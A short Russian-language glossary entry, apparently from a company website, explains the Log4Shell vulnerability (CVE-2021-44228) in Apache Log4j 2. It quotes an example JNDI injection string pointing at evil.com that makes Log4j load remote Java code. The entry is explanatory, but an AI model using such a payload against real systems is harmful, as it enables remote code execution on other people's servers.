ADG Оставить заявку

Log4Shell

Также: CVE-2021-44228, Log4j RCE, JNDI injection, Log4j уязвимость

Log4Shell - критическая уязвимость удалённого выполнения кода в библиотеке Apache Log4j 2, обнаруженная в декабре 2021 года. Атакующий передаёт в любое залогированное поле строку вида ${jndi:ldap://evil.com/x} - Log4j обрабатывает её как шаблон, инициирует LDAP-запрос и загружает произвольный Java-класс с внешнего сервера. Log4j применялась повсеместно, поэтому под удар попали миллионы сервисов - от игровых серверов до корпоративных систем.

Статьи с этим термином · 14